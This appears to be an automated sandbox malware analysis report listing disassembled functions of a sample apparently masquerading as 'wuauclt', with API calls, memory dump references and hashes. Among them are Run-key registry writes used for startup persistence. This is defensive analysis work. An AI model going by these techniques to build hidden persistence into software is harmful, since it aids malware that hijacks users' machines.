                                                                            • Source File: 0000002A.00000003.2177669408.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_3_2330000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID: -
                                                                            • API String ID: 4275171209-2547889144
                                                                            • Opcode ID: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
                                                                            • Instruction ID: e4cda7654625e7fbbb267cbdc61ad788844b4b00db57c64fd95528ee63294f29
                                                                            • Opcode Fuzzy Hash: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
                                                                            • Instruction Fuzzy Hash: E12134716483015FD318CA54CC01F6BB7E9EBC8710F088A2CF9959B3C1D775A909C7A2
                                                                            Function 00402EB0 Relevance: 4.6, APIs: 3, Instructions: 69fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(?,C0000000,?,00000000,00000002,00000080,00000000,?,00000000,?,00402FAB,00406977,00000000,00406C22), ref: 00402F4B
                                                                            • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F6B
                                                                            • GetLastError.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F7F
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileHandleLast
                                                                            • String ID:
                                                                            • API String ID: 1572049330-0
                                                                            • Opcode ID: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
                                                                            • Instruction ID: 8895028cb5cdc15445adb39e81ddeb6a4987250684acebc896c500d1f95e65c5
                                                                            • Opcode Fuzzy Hash: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
                                                                            • Instruction Fuzzy Hash: 4A11086120010296E7149F59CA8C71765649F84358F28C37BE8097F3E6D6FCCC85939D
                                                                            Function 00404B70 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID:
                                                                            • API String ID: 849931509-0
                                                                            • Opcode ID: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction ID: 2826a8d518f421b74224b4c9e13106b3c01b6d5214c42722886c747e2e10fd3a
                                                                            • Opcode Fuzzy Hash: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction Fuzzy Hash: F801E1B0A04204AFDB40FFA9D84295EBBFCEF48704F5044BAB504F3691DA38DA009628
                                                                            Function 00404C18 Relevance: 4.5, APIs: 3, Instructions: 40registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404BFC: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C7F
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Close$OpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 1607946009-0
                                                                            • Opcode ID: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction ID: 4b701f08789f1177e28b55cf3da9d2e9372874710ef882e2c23d1ca645a241ff
                                                                            • Opcode Fuzzy Hash: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction Fuzzy Hash: 56F049F160421866D700EB958C81FDE777C9B44354F0041ABBA45F7282D6789F408BE9
                                                                            Function 00404ACC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00404AEB
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                            • API String ID: 2289755597-1428018034
                                                                            • Opcode ID: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction ID: f4ecd25457bc41be08a6e23874f29c63b64927a4b92a18da8b30fdf3cb70f2a0
                                                                            • Opcode Fuzzy Hash: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction Fuzzy Hash: 39D05EB235C30079E31D96548C43FBA73949794F10F20461EB3A66A1C0DAB07504961D
                                                                            Function 004038E0 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 0face7e6a07afa4f99c73d468a9f1e343faa34a2b1e5e58e08866c2428f9d067
                                                                            • Instruction ID: 1df635f73e8d6915756eab4c5c951cbada66195828d5823cced2058d235b0013
                                                                            • Opcode Fuzzy Hash: 0face7e6a07afa4f99c73d468a9f1e343faa34a2b1e5e58e08866c2428f9d067
                                                                            • Instruction Fuzzy Hash: 93214CF09002419BDB20AF6984887567ED96B44316F28857BE848B72D6D7BCCEC0CB59
                                                                            Function 004038D8 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 34b4af9424ecf88636d9b1d120e9cda0082e90ba4aa25ef423796a56350a7c74
                                                                            • Instruction ID: e102d307cc8d2ba104a24443bf267b0a457ef6f3725beea8bc8804b3aaa65652
                                                                            • Opcode Fuzzy Hash: 34b4af9424ecf88636d9b1d120e9cda0082e90ba4aa25ef423796a56350a7c74
                                                                            • Instruction Fuzzy Hash: 23214AF09002419EDB20AF6984887567FE86F45316F1884BBE444A62D6D7BCCAC0CA5A
                                                                            Function 004038DC Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 7f65ca9c6e4620e585d9556c48294706103df5a0fdade0584281f7ed769f9ece
                                                                            • Instruction ID: fd5089775d46e85b253662f2f7318a69e1a8033d09b585e59d9f2ef21dff18ec
                                                                            • Opcode Fuzzy Hash: 7f65ca9c6e4620e585d9556c48294706103df5a0fdade0584281f7ed769f9ece
                                                                            • Instruction Fuzzy Hash: A0213DF09002419ADB20AF6984887567EE86F44316F14857BE444B62D6D7BCCEC0CA5D
                                                                            Function 00402AFC Relevance: 3.1, APIs: 2, Instructions: 60fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction ID: a1f473cf3bc07306b130f529efb15ea380eb81567c08e13a342af83bccae4885
                                                                            • Opcode Fuzzy Hash: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction Fuzzy Hash: E611FE71A00109EFDB40DF69CA45A9EB7F8EF58350B108477E808EB2C0E6B4EE009765
                                                                            Function 00404AF8 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404ACC: RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID:
                                                                            • API String ID: 1818849710-0
                                                                            • Opcode ID: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction ID: da0817da91744ea337fddb203b8369e77bf46fb650e87780acf5a1fbdeaccc1d
                                                                            • Opcode Fuzzy Hash: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction Fuzzy Hash: B5F068B06042087FD711AFA59C92E9EBBBCEB85718F5040BEB604B32D1DA786E11855C
                                                                            Function 00402AFA Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 1549d7ec87df20cd97c4e70c505dd4663c28e3963fd69a7481bb40ac7399a907
                                                                            • Instruction ID: c6e1b1fb9c3516b3f16996619766862c98deb96cc2c348e4269c8597c4437c2e
                                                                            • Opcode Fuzzy Hash: 1549d7ec87df20cd97c4e70c505dd4663c28e3963fd69a7481bb40ac7399a907
                                                                            • Instruction Fuzzy Hash: 1EF03071604118BFD704DEAADE89E6BB7ECDF54350B104477F508EB281E6B4ED009674
                                                                            Function 00402FAC Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00402C69,?,00000000,00000000,?,00406987,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402590
                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000,0040699C,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402FC8
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: d88d1b090b606c9240d6ad4c0da6df15bcbd48f7d749465171b98e542ed98b96
                                                                            • Instruction ID: 4a6b08c2b722228e21e0a8b4d92f73f88c53a7eb371671c656a79b332b0462ea
                                                                            • Opcode Fuzzy Hash: d88d1b090b606c9240d6ad4c0da6df15bcbd48f7d749465171b98e542ed98b96
                                                                            • Instruction Fuzzy Hash: 79D05B201041016FE72067358A2A73D7595E744784FE44477F449F96E1E5FDCC85911D
                                                                            Function 004012D0 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 004012FF
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001), ref: 00401326
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 2087232378-0
                                                                            • Opcode ID: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction ID: d870f39221132c547acdf604606a3f6d37415c35f40f0878f1ff510f596d474e
                                                                            • Opcode Fuzzy Hash: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction Fuzzy Hash: 82F02772B0023067EB20696E0C85B4366D59F49790F14407AFF08FF3E9D6B98C0042A9
                                                                            Function 00439D46 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,00000437,00000000,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439E09
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 78261a6b9fe788ced663bb357de1c82fcf65985a5e25124a9952444f367811ed
                                                                            • Instruction ID: 59c6dd2a180df94c7d145a0c1afdd1ca961f3c5420aeb78bf2f24ad8b18ccf6d
                                                                            • Opcode Fuzzy Hash: 78261a6b9fe788ced663bb357de1c82fcf65985a5e25124a9952444f367811ed
                                                                            • Instruction Fuzzy Hash: 08516E72A042068FC724CF18C881A5BB3E5BF88710F19892EEC59DB355DB75ED06CB95
                                                                            Function 00438524 Relevance: 1.6, APIs: 1, Instructions: 75libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,0043844C), ref: 00438565
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 4ddd04bc19eee49dddbff63bd050fb69c2f1bae6dbd96e986c565c5749236f46
                                                                            • Instruction ID: 4fc79d3f2b5b8faf063af9b8bc26cff02520aca8bab65447a439d837e7e270b0
                                                                            • Opcode Fuzzy Hash: 4ddd04bc19eee49dddbff63bd050fb69c2f1bae6dbd96e986c565c5749236f46
                                                                            • Instruction Fuzzy Hash: 2821C272904354EFEB224B14DC407BBF7A0EF88314F34686EF48A57281DA785D85CA54
                                                                            Function 00404412 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
